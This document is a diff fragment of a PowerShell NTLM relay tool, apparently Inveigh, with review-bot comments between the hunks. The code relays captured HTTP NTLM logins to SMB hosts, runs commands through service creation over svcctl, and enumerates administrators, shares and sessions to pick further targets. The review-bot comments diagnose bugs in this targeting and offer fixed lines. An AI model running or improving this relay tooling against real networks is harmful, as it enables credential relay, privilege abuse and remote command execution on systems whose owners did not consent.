+ {
+ $group_list += $group
+ }
+
}
- else
+
+ For($i=0;$i -lt $group_list.Count;$i++)
{
- $SMB_server = $false
+
+ ForEach($group in $inveigh.group_table.keys)
+ {
+
+ if($inveigh.group_table.$group -contains $group_list[$i])
+ {
+ $group_list += $group
+ }
+
+ }
+
}
- if($inveigh.enumeration_list | Where-Object {$_.IP -eq $target})
+ return $group_list
+ }
+
+ ForEach($session in $initiator_sessions)
+ {
+ $session_groups += Get-SessionGroup $session
+ }
+
+ ForEach($group in $session_groups)
+ {
+ $target_hostnames = $inveigh.enumeration_data | Where-Object {$_."Administrator Groups" -contains $group -and !$_.IP} | Select-Object -expand Hostname
+
+ if($target_hostnames)
{
- $target_index = $inveigh.enumeration_list | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
- $inveigh.enumeration_list[$target_index].Targeted = $true
- $inveigh.enumeration_list[$target_index]."Last Activity" = $(Get-Date -format s)
+ $SMB_target_results = Test-SMBTarget $target_hostnames $SessionLimitPriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
}
else
{
- $inveigh.enumeration_list += New-RelayEnumObject -IP $target -Targeted $true -SMB2 $SMB2 -Signing $signing -SMBServer $SMB_server -LastActivity $(Get-Date -format s)
- }
+ $targets = $inveigh.enumeration_data | Where-Object {$_."Administrator Groups" -contains $group -and $_.IP} | Select-Object -expand IP
+
+ if($targets)
+ {
+ $SMB_target_results = Test-SMBTarget $targets $SessionLimitPriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
- if(!$SMB2 -or $signing -or !$SMB_port_test_success)
- {
- $target = $null
}
- else
+
+ }
+
+ }
+
+ # check if mapped netsession match any local admin group members
+ if(!$targets -and !$target)
+ {
+ $initiator_mapped_net_sessions = $inveigh.enumeration_data | Where-Object {($_.IP -eq $SourceIP -or $_.Hostname -eq $source_hostname) -and $_."NetSessions Mapped"} | Select-Object -expand "NetSessions Mapped"
+
+ if($initiator_mapped_net_sessions)
+ {
+
+ ForEach($session in $initiator_mapped_net_sessions)
{
+ $target_hostnames = $inveigh.enumeration_data | Where-Object {($_."Administrator Users" -like "$session@*" -or $_."Administrator Users" -like "*\$session") -and !$_.IP} | Select-Object -expand Hostname
- if(!$inveigh.relay_history_table.$SourceIP)
+ if($target_hostnames)
{
- $inveigh.relay_history_table.Add($SourceIP,[Array]$target)
+ $SMB_target_results = Test-SMBTarget $target_hostnames $SessionLimitPriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
}
- elseif($inveigh.relay_history_table.$SourceIP -notcontains $target)
+ else
{
- $inveigh.relay_history_table.$SourceIP += $target
+ $targets = $inveigh.enumeration_data | Where-Object {($_."Administrator Users" -like "$session@*" -or $_."Administrator Users" -like "*\$session") -and $_.IP} | Select-Object -expand IP
+
+ if($targets)
+ {
+ $SMB_target_results = Test-SMBTarget $targets $SessionLimitPriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
+
}
}
}
- else
+
+ }
+
+ # check if source IP matches any netsessions
+ if(!$targets -and !$target -and $SourceIP)
+ {
+ $targets = $inveigh.enumeration_data | Where-Object {$_."NetSession" -contains $SourceIP} | Select-Object -expand IP
+
+ if($targets)
{
- $target = $null
+ $SMB_target_results = Test-SMBTarget $target $SessionLimitUnpriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
}
-
+
+ }
+
+ # get list of systems with custom shares
+ if(!$targets -and !$target)
+ {
+ $targets = $inveigh.enumeration_data | Where-Object {$_."Shares"} | Select-Object -expand IP
+
+ if($targets)
+ {
+ $SMB_target_results = Test-SMBTarget $targets $SessionLimitShare
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
+
+ }
+
+ # get random target
+ if(!$target -and $TargetMode -eq 'Random')
+ {
+ $SMB_target_results = Test-SMBTarget $inveigh.target_list $SessionLimitUnpriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
+
+ if($target -and !$inveigh.relay_history_table.$SourceIP)
+ {
+ $inveigh.relay_history_table.Add($SourceIP,[Array]$target)
+ }
+ elseif($target -and $inveigh.relay_history_table.$SourceIP -notcontains $target)
+ {
+ $inveigh.relay_history_table.$SourceIP += $target
}
}
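Review bot: The netsession branch on L804-814 cannot select a target: L806 filters on `$_."NetSession"` while the property created by New-RelayEnumObject is "NetSessions" (L334), and L811 passes the still-empty `$target` to Test-SMBTarget instead of `$targets`; the lines should read `$targets = $inveigh.enumeration_data | Where-Object {$_."NetSessions" -contains $SourceIP} | Select-Object -expand IP` and `$SMB_target_results = Test-SMBTarget $targets $SessionLimitUnpriv`. The group check on L670 is guarded by `-and $target`, the opposite of the `!$target` guard on the sibling checks at L765, L804 and L820, so it either never runs or overwrites a target already chosen; `!$target` looks intended. In Test-SMBTarget, L401 compares `(New-TimeSpan $_.Targeted $filter_date).Minutes`, the 0-59 minutes component, against $TargetRefresh whose default is 60 (L119), so a host without an SMB server is excluded forever; `.TotalMinutes` is what the refresh interval needs. Get-SessionGroup (L705-719) appends to $group_list while looping on its growing Count with no `-notcontains` guard, so mutually nested groups in group_table never terminate, and the IPv6 check on L518 reads .IsIPv6LinkLocal from the string produced on L516 rather than from the address object, so it is always false. The history and session-limit filters on L415-479 sit inside `if($targets_excluded)` (L403-481) and therefore do not run when nothing is excluded, which looks like a misplaced brace; the enclosing try opened on L631 closes outside the hunk.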
@@ -2360,7 +2651,7 @@ $SMB_relay_functions_scriptblock =
{
$error_message = $_.Exception.Message
$error_message = $error_message -replace "`n",""
- $inveigh.output_queue.Add("[-] $error_message") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
}
return $SMB_client,$target
@@ -2439,13 +2730,12 @@ $SMB_relay_functions_scriptblock =
if($HTTP_NTLM_domain_string -ne '')
{
- #$inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null
- if(!$inveigh.relay_failed_auth_table.$HTTP_username_full)
+ if(!$inveigh.relay_failed_auth_table.ContainsKey($HTTP_username_full))
{
$inveigh.relay_failed_auth_table.Add($HTTP_username_full,[Array]$target)
}
- elseif($inveigh.relay_failed_auth_table.$HTTP_username_full -notcontains $target)
+ else
{
$inveigh.relay_failed_auth_table.$HTTP_username_full += $target
}
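Review bot: Replacing `elseif(... -notcontains $target)` with a bare `else` on L868 means every failed authentication now appends $target to relay_failed_auth_table.$HTTP_username_full, including repeats for the same target, where before each target appeared once. If the new $FailedAuthLimit (L107, default 2) is compared against this array's length elsewhere, two failures against one host now exhaust the limit for that user; if that is the intent, a comment such as `# one entry per failed attempt, compared against FailedAuthLimit` keeps the next reader from reverting it. Whether the array is used as a count or as a set is not visible in this hunk.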
@@ -2462,7 +2752,7 @@ $SMB_relay_functions_scriptblock =
{
$error_message = $_.Exception.Message
$error_message = $error_message -replace "`n",""
- $inveigh.output_queue.Add("[-] $error_message") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
$SMB_relay_failed = $true
}
@@ -2554,7 +2844,6 @@ $SMB_relay_functions_scriptblock =
'CreateRequest'
{
$tree_ID = $SMB_client_receive[40..43]
- #$tree_ID = 0x01,0x00,0x00,0x00
$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
$message_ID++
$packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
@@ -2662,22 +2951,23 @@ $SMB_relay_functions_scriptblock =
$packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has command execution privilege on $target") > $null
- $administrator_list = $inveigh.enumeration_list | Where-Object {$_.IP -eq $target} | ForEach-Object {$_."Administrator Users"}
- if($administrator_list -notcontains $HTTP_username_full)
+ if($inveigh.domain_mapping_table.ContainsKey($HTTP_NTLM_domain_string))
{
- $administrator_list += $HTTP_username_full
- $target_index = $inveigh.enumeration_list | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
- $inveigh.enumeration_list[$target_index].Sessions = $administrator_list
+ $privileged_user = ($HTTP_NTLM_user_string + "@" + $inveigh.domain_mapping_table.$HTTP_NTLM_domain_string).ToUpper()
}
-
- if(!$inveigh.relay_privilege_table.$HTTP_username_full) # check
+ else
{
- $inveigh.relay_privilege_table.Add($HTTP_username_full,[Array]$target)
+ $privileged_user = $HTTP_username_full
}
- elseif($inveigh.relay_privilege_table.$HTTP_username_full -notcontains $target)
+
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+ [Array]$privileged_user_list = $inveigh.enumeration_data[$target_index].Privileged
+
+ if($privileged_user_list -notcontains $privileged_user)
{
- $inveigh.relay_privilege_table.$HTTP_username_full += $target
+ $privileged_user_list += $privileged_user
+ $inveigh.enumeration_data[$target_index].Privileged = $privileged_user_list
}
if($AccessCheck)
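Review bot: `$target_index` at L910 is null whenever `$target` has no entry in `$inveigh.enumeration_data`, and indexing the array with a null at L911 then raises rather than returning an empty list (PowerShell reports the index evaluating to null), so the privileged-user bookkeeping only works once the target has already been recorded and otherwise falls into the surrounding catch. Either guard the update with `if($null -ne $target_index)` or add a comment stating that an enumeration entry is guaranteed to exist before the Execute path runs, if that is the invariant relied on. The old `relay_privilege_table` writes are dropped here; if anything else still reads that table it now stays empty. The enclosing function continues outside this hunk.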
@@ -2698,11 +2988,6 @@ $SMB_relay_functions_scriptblock =
}
elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00')
{
-
- if($HTTP_NTLM_domain_string -ne '')
- {
- #$inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null
- }
if($Attack -notcontains 'Session')
{
@@ -2963,7 +3248,7 @@ $SMB_relay_functions_scriptblock =
$SMB_client_stream.Flush()
$SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
- if($Attack -contains 'Session')
+ if($Attack -contains 'Session' -or $Attack -contains 'Execute')
{
$inveigh.session_message_ID_table[$inveigh.session_count] = $message_ID
$stage = 'Exit'
@@ -3004,22 +3289,11 @@ $SMB_relay_functions_scriptblock =
{
$error_message = $_.Exception.Message
$error_message = $error_message -replace "`n",""
- $inveigh.output_queue.Add("[-] $error_message") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
$stage = 'Exit'
}
}
-
- if(!$SMB_relay_failed -and $RelayAutoDisable -eq 'Y' -and $inveigh.target_list.Count -eq 1 -and $Attack -notcontains 'Session')
- {
- #$inveigh.target_list.Remove($Target)
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay auto disabled due to success") > $null
- $inveigh.SMB_relay = $false
- }
- elseif(!$SMB_relay_failed -and $Attack -notcontains 'Session')
- {
- #$inveigh.target_list.Remove($Target)
- }
if($Attack -contains 'Session')
{
@@ -3034,7 +3308,7 @@ $SMB_relay_functions_scriptblock =
function SMBRelayEnum
{
- param ($SMB_client,$SMB_version,$SMB_user_ID,$session_ID,$process_ID)
+ param ($SMB_client,$SMB_user_ID,$session_ID,$process_ID,$Enumerate,$EnumerateGroup)
function Get-StatusPending
{
@@ -3050,10 +3324,10 @@ $SMB_relay_functions_scriptblock =
$client_receive = New-Object System.Byte[] 81920
$SMB_signing = $false
- $message_ID = $inveigh.session_message_ID_table[$inveigh.session_current]
- $action = "All"
+ $message_ID = $inveigh.session_message_ID_table[$inveigh.session_count]
+ $action = $Enumerate
$tree_ID = 0x00,0x00,0x00,0x00
- $group = "Administrators"
+ $group = $EnumerateGroup
if($Action -eq 'All')
{
@@ -3201,7 +3475,9 @@ $SMB_relay_functions_scriptblock =
}
catch
{
- Write-Output "[-] Session connection is closed"
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
$stage = 'Exit'
}
@@ -3648,7 +3924,6 @@ $SMB_relay_functions_scriptblock =
$response_user_start = $response_user_count * 8 + 164
$response_user_end = $response_user_start
$response_user_length_start = 152
- #$response_user_list = @()
$i = 0
while($i -lt $response_user_count)
@@ -3674,13 +3949,10 @@ $SMB_relay_functions_scriptblock =
$response_user = $response_user -replace "-00",""
$response_user = $response_user.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$response_user = New-Object System.String ($response_user,0,$response_user.Length)
- #Add-Member -InputObject $response_user_object -MemberType NoteProperty -Name Username $response_user
$response_user_length_start = $response_user_length_start + 8
- #$response_user_list += $response_user_object
$i++
}
- #Write-Output $response_user_list | Sort-Object -property Username |Format-Table -AutoSize
$stage = 'CloseRequest'
}
@@ -3728,12 +4000,11 @@ $SMB_relay_functions_scriptblock =
$response_user_start = $response_user_count * 16 + $response_domain_start + 12
$response_user_end = $response_user_start
$response_user_length_start = $response_domain_start + 4
- $response_user_list = @()
+ #$response_user_list = @()
$i = 0
while($i -lt $response_user_count)
{
- #$response_user_object = New-Object PSObject
[Byte[]]$response_user_type_bytes = $client_receive[($response_user_length_start - 4)]
[Byte[]]$response_user_length_bytes = $client_receive[$response_user_length_start..($response_user_length_start + 1)]
$response_user_length = [System.BitConverter]::ToInt16($response_user_length_bytes,0)
@@ -3758,8 +4029,6 @@ $SMB_relay_functions_scriptblock =
$response_user = $response_user -replace "-00",""
$response_user = $response_user.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$response_user = New-Object System.String ($response_user,0,$response_user.Length)
- #Add-Member -InputObject $response_user_object -MemberType NoteProperty -Name Username $response_user
- #Add-Member -InputObject $response_user_object -MemberType NoteProperty -Name Domain $response_domain_list[$response_SID_index]
$response_user_length_start = $response_user_length_start + 16
$response_administrator = $response_domain_list[$response_SID_index] + "\" + $response_user
@@ -3895,7 +4164,7 @@ $SMB_relay_functions_scriptblock =
$inveigh.output_queue.Add($enumerate_share_list -join ",") > $null
}
- if($enumerate_netsession_list -gt 0 -and $action_stage -eq 'NetSession')
+ if($enumerate_netsession_list.Count -gt 0 -and $action_stage -eq 'NetSession')
{
$inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $target NetSessions:") > $null
$inveigh.output_queue.Add($enumerate_netsession_list -join ",") > $null
@@ -4595,7 +4864,6 @@ $SMB_relay_functions_scriptblock =
}
elseif($action_stage -eq 'Share' -and $share_list.Count -gt 0 -and $j -eq $share_list.Count - 1)
{
- #Write-Output $response_object_list | Sort-Object -property Share |Format-Table -AutoSize
$tree_ID = $tree_IPC
$stage = 'TreeDisconnect'
$j++
@@ -4660,7 +4928,9 @@ $SMB_relay_functions_scriptblock =
}
catch
{
- $inveigh.output_queue.Add("[-] Session connection is closed")
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
$stage = 'Exit'
}
@@ -4700,19 +4970,99 @@ $SMB_relay_functions_scriptblock =
{
$error_message = $_.Exception.Message
$error_message = $error_message -replace "`n",""
- $inveigh.output_queue.Add("[-] $error_message") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
$stage -ne 'Exit'
}
}
- $target_index = $inveigh.enumeration_list | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
- $inveigh.enumeration_list[$target_index]."Administrator Users" = $enumerate_group_user_list
- $inveigh.enumeration_list[$target_index]."Administrator Groups" = $enumerate_group_group_list
- $inveigh.enumeration_list[$target_index]."Local Users" = $enumerate_user_list
- $inveigh.enumeration_list[$target_index].Shares = $enumerate_share_list
- $inveigh.enumeration_list[$target_index].NetSessions = $enumerate_netsession_list
- $inveigh.session_message_ID_table[$inveigh.session_current] = $message_ID
+ For($i = 0;$i -lt $enumerate_group_user_list.Count;$i++)
+ {
+ $user_entry = $enumerate_group_user_list[$i]
+ $user_entry_split = $user_entry.Split("\")
+ $domain = $user_entry_split[0]
+ $username = $user_entry_split[1]
+
+ if($inveigh.domain_mapping_table.ContainsKey($domain))
+ {
+ $user_update = ($username + "@" + $inveigh.domain_mapping_table.$domain).ToUpper()
+ $enumerate_group_user_list[$i] = $user_update
+ }
+
+ }
+
+ For($i = 0;$i -lt $enumerate_group_group_list.Count;$i++)
+ {
+ $group_entry = $enumerate_group_group_list[$i]
+ $group_entry_split = $group_entry.Split("\")
+ $domain = $group_entry_split[0]
+ $group = $group_entry_split[1]
+
+ if($inveigh.domain_mapping_table.ContainsKey($domain))
+ {
+ $group_update = ($group + "@" + $inveigh.domain_mapping_table.$domain).ToUpper()
+ $enumerate_group_group_list[$i] = $group_update
+ }
+
+ }
+
+ $inveigh.session_message_ID_table[$inveigh.session_count] = $message_ID
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_index]."Administrator Users" = $enumerate_group_user_list
+ $inveigh.enumeration_data[$target_index]."Administrator Groups" = $enumerate_group_group_list
+ $inveigh.enumeration_data[$target_index]."Local Users" = $enumerate_user_list
+ $inveigh.enumeration_data[$target_index].Shares = $enumerate_share_list
+ $net_sessions_unique = @()
+
+ ForEach($net_session_entry in $enumerate_netsession_list)
+ {
+
+ if($inveigh.enumeration_data[$target_index].NetSessions -notcontains $net_session_entry)
+ {
+ $net_sessions_unique += $net_session_entry
+ }
+
+ $net_session_IP = ($net_session_entry.Split("\"))[2]
+ $net_session_user = ($net_session_entry.Split("\"))[3]
+
+ if($inveigh.enumeration_data | Where-Object {$_.IP -eq $net_session_IP})
+ {
+ $net_session_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $net_session_IP} | Select-Object -expand Index
+
+ if($net_session_index -and $inveigh.enumeration_data[$net_session_index].NetSessions -notcontains $net_session_user)
+ {
+ $inveigh.enumeration_data[$net_session_index].NetSessionsMapped += $net_session_user
+ }
+
+ }
+ else
+ {
+ if(!($inveigh.enumeration_data | Where-Object {$_.IP -eq $net_session_IP}))
+ {
+
+ try
+ {
+ $mapped_hostname = [System.Net.Dns]::GetHostEntry($net_session_IP).HostName
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS reverse lookup for $net_session_IP failed") > $null
+ }
+
+ }
+
+ $inveigh.enumeration_data += New-RelayEnumObject -IP $net_session_IP -Hostname $mapped_hostname -NetSessionsMapped $net_session_user
+ }
+
+ }
+
+ $inveigh.enumeration_data[$target_index].NetSessions += $net_sessions_unique
+
+ if(!$RPC_access_denied)
+ {
+ $inveigh.enumeration_data[$target_index].Enumerate = $(Get-Date -format s)
+ }
+
}
}
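Review bot: The guard at L1125, `$net_session_index -and ...`, is false when the matching host sits at index 0 of `$inveigh.enumeration_data`, so the first recorded host never receives mapped sessions, and the `-notcontains` test reads `NetSessions` while the append goes to `NetSessionsMapped`, so the same user can be appended on every enumeration; `if($null -ne $net_session_index -and $inveigh.enumeration_data[$net_session_index].NetSessionsMapped -notcontains $net_session_user)` addresses both. `$mapped_hostname` at L1138 is never reset between iterations, so when a reverse lookup fails the new entry created at L1147 inherits the hostname resolved for the previous IP; set `$mapped_hostname = $null` before the try. The inner `if(!(...))` at L1133 re-tests the condition the else branch already established and can be removed. The enclosing SMBRelayEnum function starts outside this hunk.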
@@ -4720,9 +5070,10 @@ $SMB_relay_functions_scriptblock =
# HTTP/HTTPS/Proxy Server ScriptBlock
$HTTP_scriptblock =
{
- param ($Attack,$Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPResetDelay,$HTTPResetDelayTimeout,$HTTPS_listener,
- $Proxy,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$SessionLimitPriv,$SessionLimitUnpriv,
- $SessionLimitShare,$SessionPriority,$Target,$Username,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
+ param ($Attack,$Challenge,$Command,$Enumerate,$EnumerateGroup,$FailedAuthLimit,$HTTPIP,$HTTPPort,$HTTPResetDelay,
+ $HTTPResetDelayTimeout,$HTTPS_listener,$Proxy,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$RepeatEnumerate,
+ $RepeatExecute,$Service,$SMB_version,$SessionLimitPriv,$SessionLimitUnpriv,$SessionLimitShare,
+ $SessionPriority,$Target,$TargetMode,$TargetRefresh,$Username,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
function NTLMChallengeBase64
{
@@ -4747,25 +5098,51 @@ $HTTP_scriptblock =
}
$inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null
-
- $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
- 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 +
+ $hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.computer_name)
+ $netBIOS_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.netBIOS_domain)
+ $DNS_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.DNS_domain)
+ $DNS_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.DNS_computer_name)
+ $hostname_length = [System.BitConverter]::GetBytes($hostname_bytes.Length)[0,1]
+ $netBIOS_domain_length = [System.BitConverter]::GetBytes($netBIOS_domain_bytes.Length)[0,1]
+ $DNS_domain_length = [System.BitConverter]::GetBytes($DNS_domain_bytes.Length)[0,1]
+ $DNS_hostname_length = [System.BitConverter]::GetBytes($DNS_hostname_bytes.Length)[0,1]
+ $target_length = [System.BitConverter]::GetBytes($hostname_bytes.Length + $netBIOS_domain_bytes.Length + $DNS_domain_bytes.Length + $DNS_domain_bytes.Length + $DNS_hostname_bytes.Length + 36)[0,1]
+ $target_offset = [System.BitConverter]::GetBytes($netBIOS_domain_bytes.Length + 56)
+
+ $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
+ $netBIOS_domain_length +
+ $netBIOS_domain_length +
+ 0x38,0x00,0x00,0x00 +
+ 0x05,0x82,0x89,0xa2 +
$HTTP_challenge_bytes +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
- 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
- 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
- 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
- 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
- 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
- 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
- 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
- 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $target_length +
+ $target_length +
+ $target_offset +
+ 0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f +
+ $netBIOS_domain_bytes +
+ 0x02,0x00 +
+ $netBIOS_domain_length +
+ $netBIOS_domain_bytes +
+ 0x01,0x00 +
+ $hostname_length +
+ $hostname_bytes +
+ 0x04,0x00 +
+ $DNS_domain_length +
+ $DNS_domain_bytes +
+ 0x03,0x00 +
+ $DNS_hostname_length +
+ $DNS_hostname_bytes +
+ 0x05,0x00 +
+ $DNS_domain_length +
+ $DNS_domain_bytes +
+ 0x07,0x00,0x08,0x00 +
$HTTP_timestamp +
0x00,0x00,0x00,0x00,0x0a,0x0a
$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
$NTLM = 'NTLM ' + $NTLM_challenge_base64
- $NTLM_challenge = $HTTP_challenge
+ #$NTLM_challenge = $HTTP_challenge
return $NTLM
}
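Review bot: The constants in the rebuilt CHALLENGE_MESSAGE at L1188-L1189 are undocumented: `+ 36` is six 4-byte AV_PAIR headers plus the 8-byte timestamp value and the 4-byte MsvAvEOL terminator, `+ 56` is the fixed size of the challenge header that precedes TargetName, and `$DNS_domain_bytes.Length` appearing twice in the sum is deliberate because the DNS domain is emitted as both AvId 0x04 and AvId 0x05 below. Without a comment the repeated term reads as a copy-paste slip and invites a "fix" that would make the TargetInfo length field disagree with the bytes that follow it; a line such as `# TargetInfo length = 6 AV_PAIR headers (24) + timestamp (8) + MsvAvEOL (4); DNS domain is sent twice (DnsDomainName and DnsTreeName)` would settle it. The function NTLMChallengeBase64 starts outside this hunk.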
@@ -4798,7 +5175,6 @@ $HTTP_scriptblock =
$HTTP_client_close = $true
$process_ID_bytes = Get-ProcessIDArray
$relay_step = 0
- $inveigh.HTTP_listener = $HTTP_listener # debug remove
if($proxy_listener)
{
@@ -5190,23 +5566,80 @@ $HTTP_scriptblock =
}
- if($inveigh.enumeration_list | Where-Object {$_.IP -eq $HTTP_source_IP})
+ if($inveigh.domain_mapping_table.ContainsKey($HTTP_NTLM_domain_string))
+ {
+ $session = ($HTTP_NTLM_user_string + "@" + $inveigh.domain_mapping_table.$HTTP_NTLM_domain_string).ToUpper()
+ $hostname = ($HTTP_NTLM_host_string + "." + $inveigh.domain_mapping_table.$HTTP_NTLM_domain_string).ToUpper()
+ }
+ else
+ {
+ $session = $HTTP_username_full
+ }
+
+ if($inveigh.enumeration_data | Where-Object {$_.Hostname -eq $hostname})
{
- $session_list = $inveigh.enumeration_list | Where-Object {$_.IP -eq $HTTP_source_IP} | ForEach-Object {$_.Sessions}
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.Hostname -eq $hostname} | Select-Object -expand Index
+ $session_list = @($inveigh.enumeration_data[$target_index].Sessions)
+
+ if($inveigh.domain_mapping_table.ContainsKey($HTTP_NTLM_domain_string))
+ {
+
+ For($i = 0;$i -lt $session_list.Count;$i++)
+ {
+ $session_username = ($session_list[$i].Split("\"))[1]
+ $session_update = $session_username + "@" + $inveigh.domain_mapping_table.$HTTP_NTLM_domain_string
+
+ if($session_list[$i] -like "$HTTP_NTLM_domain_string\*")
+ {
+ $session_list[$i] = $session_update
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+
+ }
- if($session_list -notcontains $HTTP_username_full)
+ if($session_list -notcontains $session)
{
- $session_list += $HTTP_username_full
- $target_index = $inveigh.enumeration_list | Where-Object {$_.IP -eq $HTTP_source_IP} | Select-Object -expand Index
- $inveigh.enumeration_list[$target_index].Sessions = $session_list
+ $session_list += $session
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+ elseif($inveigh.enumeration_data | Where-Object {$_.IP -eq $HTTP_source_IP})
+ {
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $HTTP_source_IP} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_index].Hostname = $hostname
+ $session_list = @($inveigh.enumeration_data[$target_index].Sessions)
+
+ if($inveigh.domain_mapping_table.ContainsKey($HTTP_NTLM_domain_string))
+ {
+
+ For($i = 0;$i -lt $session_list.Count;$i++)
+ {
+ $session_username = ($session_list[$i].Split("\"))[1]
+ $session_update = $session_username + "@" + $inveigh.domain_mapping_table.$HTTP_NTLM_domain_string
+
+ if($session_entry -like "$HTTP_NTLM_domain_string\*")
+ {
+ $session_list[$i] = $session_update
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+
+ }
+
+ if($session_list -notcontains $session)
+ {
+ $session_list += $session
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
}
}
else
{
- $session_list = New-Object System.Collections.ArrayList
- $session_list.Add($HTTP_username_full) > $null
- $inveigh.enumeration_list += New-RelayEnumObject -IP $HTTP_source_IP -Sessions $session_list -Targeted $false
+ $inveigh.enumeration_data += New-RelayEnumObject -IP $HTTP_source_IP -Hostname $hostname -Session $session
}
$HTTP_response_status_code = 0x32,0x30,0x30
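Review bot: `$hostname` is assigned only in the domain-mapped branch at L1249, so for an unmapped domain it is empty or left over from the previous request, and the lookup at L1256, `Where-Object {$_.Hostname -eq $hostname}`, can then match any entry whose Hostname is still null and attach the session to the wrong host; the else branch at L1251 should set it, e.g. `$hostname = $HTTP_NTLM_host_string`. At L1304 the test uses `$session_entry`, which is not defined in this block, so that loop never rewrites existing `DOMAIN\user` entries; it should read `if($session_list[$i] -like "$HTTP_NTLM_domain_string\*")` as the sibling loop at L1270 does. The two near-identical session-rewrite loops would be a good candidate for one small helper. The enclosing block starts and ends outside this hunk.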
@@ -5217,77 +5650,131 @@ $HTTP_scriptblock =
if($inveigh.SMB_relay -and $relay_step -eq 2)
{
- if(!$Username -or $Username -contains $HTTP_NTLM_user_string -or $Username -contains "$HTTP_username_full")
+ if(!$Username -or $Username -contains $HTTP_NTLM_user_string -or $Username -contains $HTTP_username_full)
{
